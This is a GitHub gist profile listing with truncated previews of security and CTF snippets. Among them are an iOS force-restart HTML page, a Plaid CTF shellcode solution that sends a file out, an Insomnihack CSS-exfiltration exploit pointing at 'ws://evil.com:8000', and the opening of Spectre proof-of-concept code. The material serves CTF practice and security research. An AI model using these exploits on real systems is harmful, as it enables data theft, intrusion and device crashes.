Skip to content

Instantly share code, notes, and snippets.

View 0xBADCA7's full-sized avatar

netcat 0xBADCA7

70 followers · 149 following
  • United States
View GitHub Profile
@0xBADCA7
0xBADCA7 / tools.md
Created March 10, 2019 07:06 — forked from ZetaTwo/tools.md
CTF/Hacking tools - Tools I use for security related work

General purpose

010 Editor - Hex editor
Sublime - Text editor
Terminator - Terminal emulator

Low-level reversing

IDA - Reversing IDE
binaryninja - Reversing IDE
capstone - Disassembly framework
unicorn - cpu emulator framework

@0xBADCA7
0xBADCA7 / sequencehunt_server.js
Created March 9, 2019 13:47 — forked from grnd/sequencehunt_server.js
#!/usr/bin/env node
// run with: node sequencehunt_server.js
// info page: http://localhost:8080/info
// correct values: http://localhost:8080/check?val0=4&val1=12&val2=77&val3=98&val4=35
var http = require('http');
var url = require('url');
var TimingAttackProtectionSeconds = 3;
@0xBADCA7
0xBADCA7 / entropy.py
Created February 2, 2019 03:09 — forked from xep624/entropy.py
This is a script which counts a character entropy in a single string.
#!/bin/env python
import math
import sys
'''
This is a script which counts a character entropy in a single string.
Usage: entropy.py STRING
@0xBADCA7
0xBADCA7 / index.html
Last active September 16, 2018 13:18
Force restart iOS 11/12
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
div {
backdrop-filter: blur(10px);
-webkit-backdrop-filter: blur(10px);
width:10000px; height:10000px;
}
</style>
</head>
@0xBADCA7
0xBADCA7 / server.asm
Created May 7, 2018 13:48 — forked from dmfutcher/server.asm
TCP Echo server in x86_64 assembly, using Linux system calls.
;; Simple TCP echo server in x86_64 assembly, using Linux syscalls
;;
;; nasm -felf64 -o server.o server.asm
;; ld server.o -o server
;; ./server
;;
global _start
;; Data definitions
@0xBADCA7
0xBADCA7 / wait_wait_dont_shell_me.py
Created May 7, 2018 13:32
Solution to Wait Wait ... Don't Shell me! Plaid CTF 2018 challenge. The shellcode sends a file to a remote socket.
from pwn import *
context.arch = 'amd64'
CODES = '''b8 __ __ __ __ bf __ __ __ __ be __ __ __ __ ba
__ __ __ __ 01 c7 29 fe 21 f2 0f 05 48 b8 __ __
__ __ __ __ __ __ 50 b8 __ __ __ __ ba __ __ __
__ bf __ __ __ __ 48 89 __ 0f 05 be __ __ __ __
bf __ __ __ __ ba __ __ __ __ 83 c0 __ 0f 05 89
__ b8 __ __ __ __ bf __ __ __ __ 41 ba __ __ __
@0xBADCA7
0xBADCA7 / waybackurls.py
Created February 5, 2018 14:26 — forked from mhmdiaa/waybackurls.py
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@0xBADCA7
0xBADCA7 / index.html
Created January 26, 2018 07:25 — forked from cgvwzq/index.html
insomnihack'18 - Cool Storage Service web challenge
<body>
<form action="http://css.teaser.insomnihack.ch/?page=profile" method="POST">
// change admin's email
<input type="text" name="email" value="wololo@coolmail.com">
<input type="text" name="csrf" value="">
<input type="text" name="change" value="Modify profile">
</form>
<iframe id="leakchar"></iframe>
<script>
const WS = "ws://evil.com:8000";
@0xBADCA7
0xBADCA7 / spectre.c
Created January 4, 2018 14:00 — forked from ErikAugust/spectre.c
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@0xBADCA7
0xBADCA7 / asm.s
Created January 4, 2018 02:09 — forked from dougallj/asm.s
x86-64 Speculative Execution Harness
global _time_load
global _cache_flush
global _run_attempt
extern _bools
extern _values
extern _pointers
section .text